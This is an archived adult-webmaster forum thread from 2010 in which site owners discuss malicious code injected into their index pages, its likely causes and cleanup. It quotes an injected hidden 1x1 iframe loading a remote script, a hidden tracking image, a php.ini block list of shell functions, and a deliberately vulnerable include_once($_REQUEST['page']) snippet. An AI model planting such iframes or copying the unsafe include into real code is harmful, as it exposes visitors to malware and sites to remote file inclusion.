Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 12-21-2010, 06:44 PM   #1
oscer
Confirmed User
 
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
People Who inject Stuff into PHP

Anyone ever seen that happen from these guys?


Registrant:
Kipec Ineara [email protected] +1.2128816540
Ineara inc
933 po box
New York,NY,US 10081

this is what was injected

iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"</iframe
__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565
oscer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 07:02 PM   #2
HomerSimpson
Too lazy to set a custom title
 
HomerSimpson's Avatar
 
Industry Role:
Join Date: Sep 2005
Location: Springfield
Posts: 13,826
just hate that injection shit....
never cared much about the code than how to clean it
and prevent from happening again...
__________________
Make a bank with Chaturbate - the best selling webcam program
Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:
HomerSimpson is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 07:19 PM   #3
oscer
Confirmed User
 
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
Yea backups ... Luckily it was a personal site and i keep multiple backups
__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565
oscer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 10:05 PM   #4
k0nr4d
Confirmed User
 
k0nr4d's Avatar
 
Industry Role:
Join Date: Aug 2006
Location: Poland
Posts: 9,228
99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.
k0nr4d is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 10:44 PM   #5
potter
Confirmed User
 
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
Quote:
Originally Posted by k0nr4d View Post
99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.
eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.
__________________

potter is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 10:50 PM   #6
Some Guy
Affordable Content!
 
Some Guy's Avatar
 
Industry Role:
Join Date: Dec 2001
Location: Tucson, Arizona
Posts: 1,750
That happened to me big-time last month. Every site of mine got hit. Every single index.html or index.php file on my server had random lines of code inserted. It royally fucked-up a few of my sites that used link exchange programs. Hugely annoying. It happened every day for a week. I spent countless hours trying to figure out what was going on. Fixing everything over and over again was a major bitch.

When I asked my hosting company about it (Colo-Cation, the best hosting company ever) they looked into it and told me that, as k0nr4d said, it was more than likely a virus on my own machine that was causing the issue. I ran a virus scan and changed every password on my server and it hasn't happened since.
Some Guy is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 11:42 PM   #7
Twoface31
Confirmed User
 
Twoface31's Avatar
 
Join Date: Sep 2006
Posts: 2,746
this is shit
__________________

Email: [email protected]
HentaiG4h * Lusty Life
ICQ: 291-953
Twoface31 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-21-2010, 11:56 PM   #8
k0nr4d
Confirmed User
 
k0nr4d's Avatar
 
Industry Role:
Join Date: Aug 2006
Location: Poland
Posts: 9,228
Quote:
Originally Posted by potter View Post
eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.
Usually files like index.html, index.php, etc are not writable by the http user, so a script would not have permissions to write to them to add said code. There are of course TGP scripts and such which write to flat files (therefor them having to be writable by the web user) which is the exception here.

That being said it's almost always a virus with this kind of thing. If not the site owner, then a designer or programmer they hired, an updater, anyone with ftp access. The first thing anyone should do is change all their passwords as soon as something like this happens.
k0nr4d is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 12:10 AM   #9
oscer
Confirmed User
 
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
Quote:
Originally Posted by k0nr4d View Post
99 out of 100 times, its a virus on your computer that grabs ftp data and either sends it to a central location which modifies files named index.*, or logs in on its own and does said changes.

I havent used FTP in a good while ... I have scp program i use ...

I secured Php on the machine !
__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565
oscer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 12:57 AM   #10
BIGTYMER
Junior Achiever
 
BIGTYMER's Avatar
 
Industry Role:
Join Date: Nov 2004
Location: Walled Garden
Posts: 17,066
I had this happen on 12/06 on one my smaller sites. No other sites on the server were hit with it.

<img width=0 height=0 src="http://*REMOVED*.com/count.gif?id=*REMOVED*">

I was hit with malware around the same time...
BIGTYMER is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 01:04 AM   #11
BIGTYMER
Junior Achiever
 
BIGTYMER's Avatar
 
Industry Role:
Join Date: Nov 2004
Location: Walled Garden
Posts: 17,066
Quote:
Originally Posted by oscer View Post
Anyone ever seen that happen from these guys?


Registrant:
Kipec Ineara [email protected] +1.2128816540
Ineara inc
933 po box
New York,NY,US 10081

this is what was injected

iframe width="1" height="1" src="http://disreco.com/images/start.php?id=vlnd"</iframe
They just reg'd that domain yesterday. I'd try calling that phone # tomorrow and I would report this to their host (Leksim Ltd).
BIGTYMER is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 08:16 AM   #12
cybermike
Confirmed User
 
Join Date: Jan 2002
Location: Ny
Posts: 4,113
I got hit hard on my tgps.. they kept changing the top 2 rows to trafficshop and other urls.. took a while but seems that my host found the backdoors

Very annoying
__________________
Hey surfers how about some The Best Porn Sites
cybermike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 09:02 AM   #13
fatfoo
ICQ:649699063
 
Industry Role:
Join Date: Mar 2003
Posts: 27,763
It sucks. Don't inject the wrong thing.
__________________
Send me an email: [email protected]
fatfoo is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 10:11 AM   #14
bl4h
Confirmed User
 
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
http://www.php.net/manual/en/intro.filter.php
bl4h is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 10:19 AM   #15
adult-help
Confirmed User
 
Industry Role:
Join Date: Mar 2008
Posts: 2,450
Quote:
Originally Posted by potter View Post
eh.. You're forgetting about having bots scan for certain versions of scripts -- versions with security holes.
i think this is the case most of the times. not our pc. bots scan for holes in scripts.also the server you host or even one account one host can be compromised.
adult-help is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 10:25 AM   #16
eroticsexxx
Confirmed User
 
eroticsexxx's Avatar
 
Industry Role:
Join Date: Aug 2006
Location: Nassau, Bahamas
Posts: 3,133
:2cents

Yes, I've heard that injecting stuff into your PeePee hurts.

I wouldn't recommend it.

__________________
eroticsexxx is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 10:33 AM   #17
TeenCat
Too lazy to set a koala
 
TeenCat's Avatar
 
Industry Role:
Join Date: Jan 2007
Location: CZ/EU forever!
Posts: 16,139
they must be a doctors
__________________

6bot
/ Coming again very soon!
Svit Zlin Radio 24/7!
TeenCat is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 10:43 AM   #18
magicmike
Confirmed User
 
Industry Role:
Join Date: Feb 2003
Location: JustPorno
Posts: 2,384
Yeah I've seen it before, will kill your SE listings as google will flag those sites as dangerous.
__________________
Just Porno with both classic and mobile porn versions.
Gay Porn Our mega gay site tranny porn
magicmike is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 10:46 AM   #19
seeandsee
Check SIG!
 
seeandsee's Avatar
 
Industry Role:
Join Date: Mar 2006
Location: Europe (Skype: gojkoas)
Posts: 50,945
learn how to prevent
__________________
BUY MY SIG - 50$/Year

Contact here
seeandsee is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 01:33 PM   #20
john FVC
Confirmed User
 
john FVC's Avatar
 
Industry Role:
Join Date: Jan 2004
Location: Europe
Posts: 671
Have had it happen in the past but the server folk ran a script to clean it up though it did take a few days as we had so much stuff on our servers. We are still with Webair and I think Webair have really got their security sorted out now.
__________________


Convert with your MILF & Mature traffic.

CCBill 50% -60% Revshare
john FVC is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 02:44 PM   #21
oscer
Confirmed User
 
Industry Role:
Join Date: Jan 2001
Location: Baltimore
Posts: 2,834
added this to php.ini

disable_functions=readfile,shell_exec,exec,virtual ,passthru,proc_close,proc_get_status,proc_open,pro c_terminate,system
__________________
XR Networks
Dedicated | VPS | Shared Hosting
ICQ 42602565
oscer is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 02:56 PM   #22
myneid
Confirmed User
 
myneid's Avatar
 
Industry Role:
Join Date: Jan 2003
Location: Los Angeles
Posts: 736
lol, my favorite is finding pages with
<?php
include_once($_REQUEST['page']);
?>
__________________
Tanguy 0x7a69 inc. Programmer/President/CEO
http://www.0x7a69.com
A Leader in Programming since 1996
PHP, Ruby on Rails, MySQL, PCI DSS, and any Technical Consulting
myneid is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 12-22-2010, 03:34 PM   #23
wehateporn
Promoting Debate on GFY
 
wehateporn's Avatar
 
Industry Role:
Join Date: Apr 2007
Posts: 27,173
Quote:
Originally Posted by Some Guy View Post
That happened to me big-time last month. Every site of mine got hit. Every single index.html or index.php file on my server had random lines of code inserted. It royally fucked-up a few of my sites that used link exchange programs. Hugely annoying. It happened every day for a week. I spent countless hours trying to figure out what was going on. Fixing everything over and over again was a major bitch.

When I asked my hosting company about it (Colo-Cation, the best hosting company ever) they looked into it and told me that, as k0nr4d said, it was more than likely a virus on my own machine that was causing the issue. I ran a virus scan and changed every password on my server and it hasn't happened since.
Someone said you can get that one from Torrents
__________________
wehateporn is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.